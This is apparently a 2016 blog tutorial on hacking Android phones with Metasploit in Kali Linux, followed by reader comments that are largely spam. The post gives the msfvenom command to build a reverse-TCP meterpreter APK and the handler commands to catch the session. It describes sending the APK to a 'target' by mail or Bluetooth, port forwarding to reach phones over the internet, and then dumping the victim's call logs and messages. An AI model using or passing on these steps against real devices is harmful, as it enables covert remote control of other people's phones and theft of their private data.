Thursday, 13 October 2016

Hacking android with Metasploit in Kali Linux

Let’s Hack android with metasploit in Kali Linux – It’s very easy
Open your terminals and type in-

Msfvenom –p android/meterpreter/reverse_tcp LHOST=your ip LPORT=4444 R > filename.apk

This will create an apk file in Home directory.

• -p => Specify Payload
• LHOST => Your IP or DDNS
• LPORT => Port you want to listen on
• R => Means RAW Format
• >/root/FILENAME.apk => Location for File

There will be some error about architecture but its ok, let it be.

Easy As That

Now the apk should be on target phone. Mail it or send it to the target by Bluetooth or share it or something like that.
Now before running that app on your target android phone, you have to start a handler. 

You can do that using – type in

1.        Msfconsole (opens up metasploit)
2.        use exploit/multi/handler
3.        set payload android/meterpreter/reverse_tcp
4.        set LHOST (your ip)
5.        set LPORT 4444
6.        exploit

Now run the app on your android phone and you'll get a meterpreter session opened!!
Now you can dump data like phone logs, messages etc…
Before installing the app, Please tick "Allow installation from Unknown Sources" from Settings.

It's really easy and almost the same.
First you need to get your public IP.
You also need your private ip. Use ifconfig command in terminal to get that.
Now there are just two small changes in the above steps
i) In the msfvenom command, in LHOST, you need to enter your 'PUBLIC IP'
ii) When creating a listener/handler, in LHOST, you need to enter your 'PRIVATE IP'

That's IT
NOTE – You Need to Port forward The Port you used in your modem/router or it won't work.

2) Apk File made from msfvenom is 0 kb
That means you have some spelling or syntax error. Please recheck the command you entered, if it’s correct, recheck again!!

3) In Phone – Cannot Parse Package
Try Another File Manager, Download a free one from google store!!

4) In Phone – App Not Installed
You May Need to Sign Your APK file, newer android versions may give error. 

5) Kali as Virtual Machine
Virtual Box is known to cause problems, so use VMWare if possible. Also Please DONT USE NAT MODE, USE BRIDGED!!
If there’s any other problem, type in the comment!! I'll try my best to help!


  1. HI there , i tried this but when the .apk file opend at the victim side on the android no session started at mine , what that means ? ,, you may contact me at or here , thank you for your great posts as well

  2. what is the error you are getting ? can you send me a screenshot mate ?

  3. Same problem I am facing my meterpreter seasion is not starting. I am using vmware and allow all permission to android app manually.

  4. This is such a great post. It was really informative as well as on to the point and I am glad that I have found it. APK for Android

  5. We never thought that one day we could actually use either an Android phone or a tablet PC to create a lot of content in one segment. this page

  6. This entry is made for the price conscious buyer who wants all mobile the perks an Android phone do not pay dollars more. oukitelcentral

  7. The business visionaries who work reliably round the clock to get positive outcomes can achieve them through their business android application.Android Airplane Simulator Games

  8. Additionally, the engineers need to test the UI of their versatile application extensively by joining both genuine gadgets and emulators.visit the site

  9. The advanced technology of Android acts as a medium and helps the software developers in developing built-in applications for the smart phones using Android platform.MRN